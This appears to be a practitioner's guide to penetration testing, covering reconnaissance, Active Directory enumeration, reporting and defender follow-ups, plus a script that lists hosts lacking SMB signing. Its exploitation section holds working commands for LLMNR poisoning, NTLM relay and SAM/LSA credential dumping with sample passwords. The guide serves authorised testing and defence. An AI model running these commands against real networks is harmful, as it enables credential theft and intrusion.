
Penetration Testing and Security Assessments: A Practitioner's Guide to Finding What Attackers Will

Last year, I was brought in to assess a mid-size financial firm that had passed three consecutive "penetration tests" from a well-known vendor. Within four hours, I had Domain Admin. The previous assessments had been little more than automated scans with executive summaries stapled on top. That experience reinforced something I tell every client: there is a dangerous gap between what most organizations think a penetration test is and what it actually needs to be.



The Difference Between Vulnerability Scanning and Penetration Testing

Let's be blunt. Running Nessus or Qualys against a subnet and exporting the PDF is not a penetration test. Vulnerability scanning is automated identification of known weaknesses. Penetration testing is the manual, creative exploitation of those weaknesses—chained together—to demonstrate real business impact.

A mature security program needs both, but confusing one for the other leaves you exposed.

Aspect     Vulnerability Scan     Penetration Test
---------  ---------------------  ---------------------------------------
Approach   Automated              Manual + Automated
Goal       Identify known CVEs    Demonstrate exploitable attack paths
Depth      Broad, shallow         Narrow, deep
Output     Vulnerability list     Narrative of compromise with evidence

Structuring Your Assessment: The Four Phases

I follow a methodology rooted in the PTES (Penetration Testing Execution Standard), adapted for enterprise realities.

1. Reconnaissance & Scoping

Before touching a single port, define rules of engagement. Then enumerate. Passive reconnaissance alone often reveals shocking exposure:

# Subdomain enumeration
subfinder -d targetcorp.com -o subdomains.txt

# Search for leaked credentials in public breaches
# (use tools like DeHashed or breach-parse responsibly and within scope)

# Harvest email formats for password spraying
theHarvester -d targetcorp.com -b linkedin -l 200

2. Enumeration & Vulnerability Discovery

Once active testing begins, go beyond default scans. Targeted enumeration wins:

# Full TCP scan with service detection and default scripts
nmap -sC -sV -p- -oA full_scan 10.10.10.0/24

# Identify SMB signing disabled (critical for relay attacks)
crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt

# Enumerate Active Directory without credentials
enum4linux-ng -A 10.10.10.5

3. Exploitation & Lateral Movement

This is where methodology separates professionals from script kiddies. A real penetration tester chains findings. For example, LLMNR/NBT-NS poisoning into NTLMv2 relay is still devastatingly effective in most enterprise networks:

# Capture NTLMv2 hashes via LLMNR poisoning
sudo responder -I eth0 -dwP

# Relay captured authentication to targets with SMB signing disabled
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -i

If you capture a hash, crack it or relay it. If you get local admin on one host, dump credentials and move laterally:

# Dump SAM and LSA from compromised host
crackmapexec smb 10.10.10.20 -u admin -p 'P@ssw0rd' --sam --lsa

4. Reporting & Remediation Guidance

The report is the deliverable your stakeholders actually consume. Every finding should include: a clear description, evidence (screenshots, command output), risk rating mapped to business impact, and specific remediation steps—not generic advice.

What Security Administrators Should Do Tomorrow

You don't need to wait for your next external assessment. Start building internal capability:

  • Deploy Responder in analyze mode (-A flag) on your network to see if LLMNR/NBT-NS is active. If it is, disable it via Group Policy immediately.
  • Audit SMB signing across your domain. Enforce it. This single change kills an entire class of relay attacks.
  • Run BloodHound against your Active Directory to visualize attack paths to Domain Admin before an attacker does:
      bloodhound-python -d targetcorp.local -u svc_audit -p 'AuditPass1!' -c All
  • Establish a regular internal assessment cadence—quarterly at minimum—and rotate between network, application, and Active Directory–focused tests.
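The SMB signing audit above is easier to act on once scan output becomes a host list. As an added example (not from the original article), this POSIX shell function reads the normal output of the phase 2 `nmap -sC -sV` scan and prints the hosts whose SMB signing is not enforced, so they can be prioritised for the Group Policy fix; the scan output embedded below is constructed sample data and its hostnames and addresses are made up.

```shell
#!/bin/sh
# Constructed sample of `nmap -sC -sV` normal output for three hosts (not real scan data).
SAMPLE_NMAP='Nmap scan report for dc01.targetcorp.local (10.10.10.5)
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.20
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.31
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)'

# Read nmap normal output on stdin and print, one per line, each host whose SMB signing
# is not enforced. Handles the smb2-security-mode wording and the legacy smb-security-mode
# wording. These are the hosts to fix first when enforcing signing via Group Policy.
smb_signing_not_required() {
    awk '
        /^Nmap scan report for / {
            host = $NF              # bare IP, or "(IP)" when a hostname resolved
            gsub(/[()]/, "", host)
        }
        /Message signing enabled but not required/ || /Message signing disabled/ || /message_signing: disabled/ {
            if (host != "" && !seen[host]++) print host
        }
    '
}

# Real use: nmap -sC -sV -p 445 -oN smb_scan.nmap 10.10.10.0/24; smb_signing_not_required < smb_scan.nmap
# Stand-alone demo over the constructed sample:
printf '%s\n' "$SAMPLE_NMAP" | smb_signing_not_required
```

Feed it the `.nmap` file that `-oA full_scan` writes and the result is the same population that `--gen-relay-list` would produce, now as a remediation worklist.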

Final Thought

Penetration testing isn't about proving you're secure. It's about proving where you're not—before someone with malicious intent does it for you. The organizations that treat assessments as genuine adversary simulations rather than compliance checkboxes are the ones that actually improve their security posture year over year. Be that organization.

